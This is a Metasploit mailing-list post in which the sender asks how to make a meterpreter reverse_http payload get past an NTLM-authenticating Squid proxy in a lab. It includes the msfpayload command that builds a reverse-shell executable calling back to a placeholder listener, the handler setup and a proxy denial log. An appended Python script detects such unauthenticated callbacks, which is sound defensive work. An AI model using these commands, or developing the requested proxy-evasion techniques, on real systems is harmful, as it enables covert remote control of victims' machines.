Metasploit mailing list archives

meterpreter ntlm proxy bypass


From: audio audience <audience099 () gmail com>
Date: Wed, 11 Apr 2012 22:49:57 +0300

Hello Everyone,

I want to bypass an NTLM-supported proxy with meterpreter.
I tested it in my lab; all outgoing traffic is blocked by the firewall for
the client. If the client wants to access the internet, it needs to give a
Windows username and password to the NTLM auth. proxy.

I created the meterpreter payload with the following options:
# msfpayload windows/meterpreter/reverse_http LHOST=x.y.z.t LPORT=8080 AutoRunScript='migrate2 iexplore.exe' X > /var/www/8.exe

For listening mode:
msf  exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_http):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     x.y.z.t          yes       The local listener hostname
   LPORT     8080             yes       The local listener port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf  exploit(handler) > exploit

[*] Started HTTP reverse handler on http://x.y.z.t:8080/
[*] Starting the payload handler...


And then I ran 8.exe on the victim computer, but the proxy blocked the
meterpreter HTTP connection, because meterpreter didn't complete NTLM auth.
Squid log:
1334171617.857      0 a.b.c.d TCP_DENIED/407 1744 GET http://x.y.z.t:8080/l2eY - NONE/- text/html

How can I bypass NTLM auth. with the meterpreter payload?

Thanks for your support
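
Added example, not part of the original post: a proxy operator's view of the Squid entry quoted above. It parses native-format access.log lines and reports client/destination pairs that only ever receive TCP_DENIED/407 and never follow up with an authenticated request. The sample addresses, the `min_denials` threshold and the reading of the eighth field as the authenticated user name are assumptions of this example.

```python
import ipaddress
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample in Squid's native access.log format (documentation addresses).
SAMPLE_LOG = """\
1334171617.857      0 192.0.2.10 TCP_DENIED/407 1744 GET http://198.51.100.7:8080/l2eY - NONE/- text/html
1334171622.901      0 192.0.2.10 TCP_DENIED/407 1744 GET http://198.51.100.7:8080/l2eY - NONE/- text/html
1334171627.944      0 192.0.2.10 TCP_DENIED/407 1744 GET http://198.51.100.7:8080/l2eY - NONE/- text/html
1334171630.120      0 192.0.2.11 TCP_DENIED/407 1790 GET http://intranet.example/ - NONE/- text/html
1334171630.410     85 192.0.2.11 TCP_MISS/200 5120 GET http://intranet.example/ alice DIRECT/203.0.113.5 text/html
"""

def parse_line(line):
    """Return the fields used below from one native-format line, or None."""
    f = line.split()
    if len(f) < 10 or "/" not in f[3]:
        return None
    result, _, status = f[3].partition("/")
    try:
        # CONNECT lines log "host:port" without a scheme; normalise for urlsplit.
        url = urlsplit(f[6] if "://" in f[6] else "//" + f[6])
        port = url.port or (443 if url.scheme == "https" else 80)
    except ValueError:
        return None
    return {"client": f[2], "result": result, "status": status,
            "host": url.hostname, "port": port, "user": f[7]}

def is_ip_literal(host):
    try:
        ipaddress.ip_address(host or "")
        return True
    except ValueError:
        return False

def unauthenticated_destinations(log_text, min_denials=3):
    """Client/destination pairs that were answered 407 and never authenticated."""
    denied, authed = defaultdict(int), set()
    for entry in filter(None, map(parse_line, log_text.splitlines())):
        key = (entry["client"], entry["host"], entry["port"])
        if entry["result"] == "TCP_DENIED" and entry["status"] == "407":
            denied[key] += 1
        elif entry["user"] != "-":
            authed.add(key)
    return [{"client": c, "host": h, "port": p, "denials": n,
             "ip_literal": is_ip_literal(h), "odd_port": p not in (80, 443)}
            for (c, h, p), n in denied.items()
            if n >= min_denials and (c, h, p) not in authed]

if __name__ == "__main__":
    for finding in unauthenticated_destinations(SAMPLE_LOG):
        print(finding)
```

A browser completing NTLM also produces 407 lines, but they are followed by a request carrying a user name, which is why the second client in the sample is not reported.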